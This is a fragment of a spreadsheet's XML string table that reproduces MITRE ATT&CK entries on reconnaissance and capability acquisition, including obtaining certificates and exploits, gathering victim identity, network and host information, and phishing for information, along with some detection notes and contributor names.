    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They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with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/004</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</si>
  <si>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Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Obtain Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</t>
  </si>
  <si>
    <t xml:space="preserve">
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</si>
  <si>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Obtain Capabilities: Vulnerabilities</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <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</si>
  <si>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Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)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</si>
  <si>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https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>Reconnaissance</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</si>
  <si>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</si>
  <si>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Gather Victim Identity Information: Credentials</t>
  </si>
  <si>
    <t>Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>Lee Christensen, SpecterOps; Toby Kohlenberg; Vinayak Wadhwa, Lucideus</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Email Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Employee Names</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Domain Properties</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>Gather Victim Network Information: DNS</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Trust Dependencies</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests)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</si>
  <si>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https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Topology</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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</si>
  <si>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https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>Gather Victim Network Information: IP Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: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 or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>27 August 2021</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Determine Physical Locations</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: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[Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Business Relationships</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Business Tempo</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>Gather Victim Org Information: Identify Roles</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1591/004</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host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</si>
  <si>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Gather Victim Host Information: Hardware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure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[Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware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</si>
  <si>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Gather Victim Host Information: Software</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host software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</si>
  <si>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Gather Victim Host Information: Firmware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Client Configurations</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.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client configurations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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration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</si>
  <si>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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Social Media</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media)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[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Search Engines</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.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[Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>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
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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1594</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</si>
  <si>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</si>
  <si>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Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting)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</si>
  <si>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https://attack.mitre.org/techniques/T1595</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</si>
  <si>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</si>
  <si>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Active Scanning: Scanning IP Blocks</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Active Scanning: Vulnerability Scanning</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning)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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>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scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open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</si>
  <si>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https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases: DNS/Passive DNS</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>Search Open Technical Databases: WHOIS</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),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</si>
  <si>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https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>Search Open Technical Databases: CDNs</t>
  </si>
  <si>
    <t>Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources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[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Scan Databases</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595)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</si>
  <si>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https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed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</si>
  <si>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https://attack.mitre.org/techniques/T1597</t>
  </si>
  <si>
    <t>Search Closed Sources: Threat Intel Vendors</t>
  </si>
  <si>
    <t>Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>Search Closed Sources: Purchase Technical Data</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1597/002</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</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</si>
  <si>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</si>
  <si>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Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Service</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).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</si>
  <si>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Robert Simmons, @MalwareUtkonos</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Attachment</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</si>
  <si>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</si>
